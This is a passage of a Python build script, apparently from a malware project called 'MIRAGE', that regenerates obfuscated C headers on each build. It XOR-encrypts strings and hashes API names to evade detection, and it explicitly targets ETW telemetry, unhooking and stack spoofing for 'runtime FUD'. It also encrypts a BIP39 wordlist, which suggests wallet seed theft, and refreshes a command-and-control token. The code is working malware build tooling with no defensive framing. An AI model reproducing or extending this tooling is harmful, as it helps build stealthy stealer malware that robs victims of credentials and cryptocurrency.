        ("vpn_ipvanish", "IPVanish"),
        ("vpn_radminvpn", "RadminVPN"),
        ("vpn_softether", "SoftEther"),
        ("vpn_protonvpn", "ProtonVPN"),
        # Stack spoof / ETW-TI / unhook (runtime FUD)
        ("kernelbase", "kernelbase.dll"),
        ("EtwEventWriteEx", "EtwEventWriteEx"),
        ("EtwEventWriteString", "EtwEventWriteString"),
        ("EtwTiSetProviderState", "EtwTiSetProviderState"),
        ("RtlUserThreadStart", "RtlUserThreadStart"),
        ("BaseThreadInitThunk", "BaseThreadInitThunk"),
        ("NtOpenSection", "NtOpenSection"),
        ("NtMapViewOfSection", "NtMapViewOfSection"),
        ("NtUnmapViewOfSection", "NtUnmapViewOfSection"),
        ("NtReadFile", "NtReadFile"),
        ("SystemFunction032", "SystemFunction032"),
        ("RtlLookupFunctionEntry", "RtlLookupFunctionEntry"),
        ("RtlAddFunctionTable", "RtlAddFunctionTable"),
    ]

    lines = []
    lines.append("// Auto-generated by make_polymorphic.py — DO NOT EDIT")
    lines.append("// XOR-encrypted strings for .rdata obfuscation")
    lines.append("")
    lines.append("#ifndef MIRAGE_ENC_STRINGS_H")
    lines.append("#define MIRAGE_ENC_STRINGS_H")
    lines.append("")
    lines.append("#include <stdint.h>")
    lines.append("#include <stddef.h>")
    lines.append("")
    lines.append("/* Decrypt helper — XOR with MIRAGE_STRING_KEY_ENC[16] from config.h */")
    lines.append("#include \"config.h\"")
    lines.append("")
    lines.append("static inline void enc_decrypt(const uint8_t *enc, size_t len, char *out) {")
    lines.append("    for (size_t i = 0; i < len; i++)")
    lines.append("        out[i] = (char)(enc[i] ^ MIRAGE_STRING_KEY_ENC[i % 16]);")
    lines.append("    out[len] = '\\0';")
    lines.append("}")
    lines.append("")
    lines.append("static inline void enc_decrypt_wide(const uint8_t *enc, size_t enc_len, wchar_t *out) {")
    lines.append("    /* enc is XOR'd narrow bytes; decrypt to narrow then widen */")
    lines.append("    for (size_t i = 0; i < enc_len; i++)")
    lines.append("        out[i] = (wchar_t)(enc[i] ^ MIRAGE_STRING_KEY_ENC[i % 16]);")
    lines.append("    out[enc_len] = L'\\0';")
    lines.append("}")
    lines.append("")

    for name, plaintext in strings:
        obf = xor_string(plaintext, key)
        c_name = name.replace(".", "_").replace("\\\\", "_")
        lines.append(f"static const uint8_t enc_{c_name}[{len(obf)}] = {{ {c_hex_array(obf)} }};")
        lines.append(f"#define ENC_{c_name.upper()}_LEN {len(obf)}")
        lines.append("")

    lines.append("#endif /* MIRAGE_ENC_STRINGS_H */")
    lines.append("")

    with open(enc_strings_h, "w", encoding="utf-8") as f:
        f.write("\n".join(lines))


def rewrite_hashes(seed, key):
    out = []
    out.append("// Auto-generated by make_polymorphic.py")
    out.append("// Do not edit manually")
    out.append("")
    out.append("#ifndef MIRAGE_HASHES_H")
    out.append("#define MIRAGE_HASHES_H")
    out.append("")
    out.append("#include <stdint.h>")
    out.append("")
    out.append("// Module hashes (28 iters, case-insensitive)")
    for m in MODULES:
        h = hash_module(m, seed, key)
        dn = m.upper().replace(".", "_")
        out.append(f"#define HASH_{dn}  0x{h:08X}u")
    out.append("")
    out.append("// Function hashes (27 iters, exact case)")
    for f in ["LdrGetProcedureAddress"] + EXPORTS:
        h = hash_func(f, seed, key)
        dn = f.replace("Nt", "").replace(".", "_")
        out.append(f"#define HASH_{dn}  0x{h:08X}u  // {f}")
    out.append("")
    out.append("#endif")
    out.append("")

    with open(HASHES_H, "w", encoding="utf-8") as f:
        f.write("\n".join(out))


def rewrite_bip39(key):
    """Generate bip39_enc.h with XOR-encrypted BIP39 wordlist arrays."""
    words_file = os.path.join(ROOT, "tools", "bip39_words.txt")
    bip39_enc_h = os.path.join(ROOT, "include", "bip39_enc.h")

    if not os.path.exists(words_file):
        print("[!] bip39_words.txt not found, skipping BIP39 encryption")
        return

    with open(words_file, "r", encoding="utf-8") as f:
        words = [line.strip() for line in f if line.strip()]

    n = len(words)
    lines = []
    lines.append("// Auto-generated by make_polymorphic.py — DO NOT EDIT")
    lines.append("// XOR-encrypted BIP39 wordlist for .rdata obfuscation")
    lines.append("")
    lines.append("#ifndef MIRAGE_BIP39_ENC_H")
    lines.append("#define MIRAGE_BIP39_ENC_H")
    lines.append("")
    lines.append("#include <stdint.h>")
    lines.append("")
    lines.append(f"#define BIP39_COUNT {n}")
    lines.append("")

    # Generate encrypted arrays
    for i, word in enumerate(words):
        obf = xor_string(word, key)
        lines.append(f"static const uint8_t enc_bip39_{i}[{len(obf)}] = {{ {c_hex_array(obf)} }};")

    lines.append("")
    lines.append(f"static const uint8_t * const enc_bip39_table[{n}] = {{")
    for i in range(n):
        sep = "," if i < n - 1 else ""
        lines.append(f"    enc_bip39_{i}{sep}")
    lines.append("};")
    lines.append("")

    lines.append(f"static const uint8_t enc_bip39_lens[{n}] = {{")
    lens_entries = []
    for i, word in enumerate(words):
        lens_entries.append(str(len(word)))
    # 8 per line for readability
    for chunk_start in range(0, n, 8):
        chunk = lens_entries[chunk_start : chunk_start + 8]
        sep = "," if chunk_start + 8 < n else ""
        lines.append("    " + ",".join(chunk) + sep)
    lines.append("};")
    lines.append("")
    lines.append("#endif /* MIRAGE_BIP39_ENC_H */")
    lines.append("")

    with open(bip39_enc_h, "w", encoding="utf-8") as f:
        f.write("\n".join(lines))
    print(f"[+] bip39_enc.h regenerated ({n} words)")


def main():
    seed = gen_seed()
    key = gen_key()
    rewrite_config(seed, key)
    rewrite_c2_token()
    rewrite_engine(seed, key)
    rewrite_hashes(seed, key)
    rewrite_encrypted_strings(key)
    rewrite_bip39(key)
    print(f"[+] MIRAGE_SEED = 0x{seed:08X}")
    print("[+] MIRAGE_STRING_KEY_ENC = " + " ".join(f"{b:02X}" for b in key))
    print("[+] engine.c XOR arrays regenerated")
    print("[+] hashes.h regenerated")


if __name__ == "__main__":
    main()
